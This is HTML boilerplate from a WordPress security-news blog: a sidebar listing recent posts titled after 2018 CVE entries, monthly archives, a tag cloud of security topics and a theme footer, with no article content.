class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search …" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside> <aside id="recent-posts-2" class="widget widget_recent_entries"> <h4 class="widget-title">Recent Posts</h4> <ul> <li> <a href="">NA – CVE-2018-10310 – A persistent cross-site scripting vulnerability…</a> </li> <li> <a href="">NA – CVE-2018-10366 – An issue was discovered in the Users (aka…</a> </li> <li> <a href="">NA – CVE-2018-10367 – An issue was discovered in WUZHI CMS 4.1.0. The…</a> </li> <li> <a href="">NA – CVE-2018-10372 – process_cu_tu_index in dwarf.c in GNU Binutils…</a> </li> <li> <a href="">NA – CVE-2018-10368 – An issue was discovered in WUZHI CMS 4.1.0. The…</a> </li> </ul> </aside><aside id="archives-2" class="widget widget_archive"><h4 class="widget-title">Archives</h4> <ul> <li><a href=''>April 2018</a></li> <li><a href=''>March 2018</a></li> <li><a href=''>February 2018</a></li> <li><a href=''>January 2018</a></li> <li><a href=''>December 2017</a></li> <li><a href=''>November 2017</a></li> <li><a href=''>October 2017</a></li> <li><a href=''>September 2017</a></li> <li><a href=''>August 2017</a></li> <li><a href=''>July 2017</a></li> <li><a href=''>June 2017</a></li> <li><a href=''>May 2017</a></li> <li><a href=''>April 2017</a></li> <li><a href=''>March 2017</a></li> <li><a href=''>February 2017</a></li> <li><a href=''>January 2017</a></li> <li><a href=''>December 2016</a></li> </ul> </aside><aside id="tag_cloud-2" class="widget widget_tag_cloud"><h4 class="widget-title">Tags</h4><div class="tagcloud"><a href="" class="tag-cloud-link tag-link-719 tag-link-position-1" style="font-size: 11.898734177215pt;" aria-label="Android (189 items)">Android</a> <a href="" class="tag-cloud-link tag-link-524 tag-link-position-2" style="font-size: 8pt;" aria-label="Cloud Security (114 items)">Cloud Security</a> <a href="" class="tag-cloud-link tag-link-38 tag-link-position-3" style="font-size: 13.316455696203pt;" aria-label="Code Scripting (227 items)">Code Scripting</a> <a href="" class="tag-cloud-link tag-link-231 tag-link-position-4" style="font-size: 11.367088607595pt;" aria-label="Cryptography (177 items)">Cryptography</a> <a href="" class="tag-cloud-link tag-link-84 tag-link-position-5" style="font-size: 8.3544303797468pt;" aria-label="dos (120 items)">dos</a> <a href="" class="tag-cloud-link tag-link-463 tag-link-position-6" style="font-size: 9.0632911392405pt;" aria-label="Enterprise Security Weekly (130 items)">Enterprise Security Weekly</a> <a href="" class="tag-cloud-link tag-link-382 tag-link-position-7" style="font-size: 8.5316455696203pt;" aria-label="Exploits (122 items)">Exploits</a> <a href="" class="tag-cloud-link tag-link-159 tag-link-position-8" style="font-size: 11.367088607595pt;" aria-label="Framework (176 items)">Framework</a> <a href="" class="tag-cloud-link tag-link-305 tag-link-position-9" style="font-size: 10.126582278481pt;" aria-label="google (152 items)">google</a> <a href="" class="tag-cloud-link tag-link-73 tag-link-position-10" style="font-size: 11.721518987342pt;" aria-label="Government (185 items)">Government</a> <a href="" class="tag-cloud-link tag-link-134 tag-link-position-11" style="font-size: 12.430379746835pt;" aria-label="hacking (201 items)">hacking</a> <a href="" class="tag-cloud-link tag-link-74 tag-link-position-12" style="font-size: 15.79746835443pt;" aria-label="Hacks (317 items)">Hacks</a> <a href="" class="tag-cloud-link tag-link-135 tag-link-position-13" style="font-size: 9.2405063291139pt;" aria-label="interview (134 items)">interview</a> <a href="" class="tag-cloud-link tag-link-21 tag-link-position-14" style="font-size: 12.430379746835pt;" aria-label="Kali Linux (202 items)">Kali Linux</a> <a href="" class="tag-cloud-link tag-link-63 tag-link-position-15" style="font-size: 20.936708860759pt;" aria-label="Linux (616 items)">Linux</a> <a href="" class="tag-cloud-link tag-link-64 tag-link-position-16" style="font-size: 14.025316455696pt;" aria-label="Mac (251 items)">Mac</a> <a href="" class="tag-cloud-link tag-link-75 tag-link-position-17" style="font-size: 19.873417721519pt;" aria-label="Malware (536 items)">Malware</a> <a href="" class="tag-cloud-link tag-link-221 tag-link-position-18" style="font-size: 8.5316455696203pt;" aria-label="Microsoft (123 items)">Microsoft</a> <a href="" class="tag-cloud-link tag-link-44 tag-link-position-19" style="font-size: 11.544303797468pt;" aria-label="Mobile Security (179 items)">Mobile Security</a> <a href="" class="tag-cloud-link tag-link-214 tag-link-position-20" style="font-size: 11.367088607595pt;" aria-label="Networking (175 items)">Networking</a> <a href="" class="tag-cloud-link tag-link-127 tag-link-position-21" style="font-size: 11.367088607595pt;" aria-label="News (176 items)">News</a> <a href="" class="tag-cloud-link tag-link-289 tag-link-position-22" style="font-size: 10.303797468354pt;" aria-label="Open Source (155 items)">Open Source</a> <a href="" class="tag-cloud-link tag-link-201 tag-link-position-23" style="font-size: 10.126582278481pt;" aria-label="Other (150 items)">Other</a> <a href="" class="tag-cloud-link tag-link-32 tag-link-position-24" style="font-size: 10.126582278481pt;" aria-label="Paul's Security Weekly (149 items)">Paul's Security Weekly</a> <a href="" class="tag-cloud-link tag-link-128 tag-link-position-25" style="font-size: 13.316455696203pt;" aria-label="paul asadoorian (228 items)">paul asadoorian</a> <a href="" class="tag-cloud-link tag-link-15 tag-link-position-26" style="font-size: 16.506329113924pt;" aria-label="Penetration Test (344 items)">Penetration Test</a> <a href="" class="tag-cloud-link tag-link-48 tag-link-position-27" style="font-size: 15.79746835443pt;" aria-label="Penetration Testing (317 items)">Penetration Testing</a> <a href="" class="tag-cloud-link tag-link-512 tag-link-position-28" style="font-size: 11.367088607595pt;" aria-label="powershell (178 items)">powershell</a> <a href="" class="tag-cloud-link tag-link-89 tag-link-position-29" style="font-size: 17.215189873418pt;" aria-label="Privacy (378 items)">Privacy</a> <a href="" class="tag-cloud-link tag-link-291 tag-link-position-30" style="font-size: 17.037974683544pt;" aria-label="Python (372 items)">Python</a> <a href="" class="tag-cloud-link tag-link-45 tag-link-position-31" style="font-size: 9.0632911392405pt;" aria-label="Python Script (130 items)">Python Script</a> <a href="" class="tag-cloud-link tag-link-2857 tag-link-position-32" style="font-size: 20.405063291139pt;" aria-label="r/blackhat (568 items)">r/blackhat</a> <a href="" class="tag-cloud-link tag-link-637 tag-link-position-33" style="font-size: 11.189873417722pt;" aria-label="ransomware (173 items)">ransomware</a> <a href="" class="tag-cloud-link tag-link-292 tag-link-position-34" style="font-size: 8pt;" aria-label="Scan (114 items)">Scan</a> <a href="" class="tag-cloud-link tag-link-67 tag-link-position-35" style="font-size: 9.7721518987342pt;" aria-label="Scanner (144 items)">Scanner</a> <a href="" class="tag-cloud-link tag-link-34 tag-link-position-36" style="font-size: 15.974683544304pt;" aria-label="security (325 items)">security</a> <a href="" class="tag-cloud-link tag-link-40 tag-link-position-37" style="font-size: 9.2405063291139pt;" aria-label="Security Tools (133 items)">Security Tools</a> <a href="" class="tag-cloud-link tag-link-35 tag-link-position-38" style="font-size: 12.075949367089pt;" aria-label="security weekly (194 items)">security weekly</a> <a href="" class="tag-cloud-link tag-link-166 tag-link-position-39" style="font-size: 8.7088607594937pt;" aria-label="Tools (124 items)">Tools</a> <a href="" class="tag-cloud-link tag-link-51 tag-link-position-40" style="font-size: 15.79746835443pt;" aria-label="Uncategorized (315 items)">Uncategorized</a> <a href="" class="tag-cloud-link tag-link-76 tag-link-position-41" style="font-size: 22pt;" aria-label="Vulnerabilities (703 items)">Vulnerabilities</a> <a href="" class="tag-cloud-link tag-link-444 tag-link-position-42" style="font-size: 8.8860759493671pt;" aria-label="Vulnerability Scanner (127 items)">Vulnerability Scanner</a> <a href="" class="tag-cloud-link tag-link-14 tag-link-position-43" style="font-size: 17.569620253165pt;" aria-label="webapps (396 items)">webapps</a> <a href="" class="tag-cloud-link tag-link-90 tag-link-position-44" style="font-size: 17.746835443038pt;" aria-label="Web Security (409 items)">Web Security</a> <a href="" class="tag-cloud-link tag-link-71 tag-link-position-45" style="font-size: 17.392405063291pt;" aria-label="Windows (387 items)">Windows</a></div> </aside></div><!-- #secondary --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="scroll-container"> <a href="#" class="scrolltop"><i class="fa fa-chevron-up"></i></a> </div> <div class="site-info container"> <a href="" rel="nofollow">Proudly powered by WordPress</a><span class="sep"> | </span>Theme: <a href="" rel="nofollow">Amadeus</a> by Themeisle. </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src=''></script> <script type='text/javascript' src=''></script> <script type='text/javascript' src=''></script> </body> </html>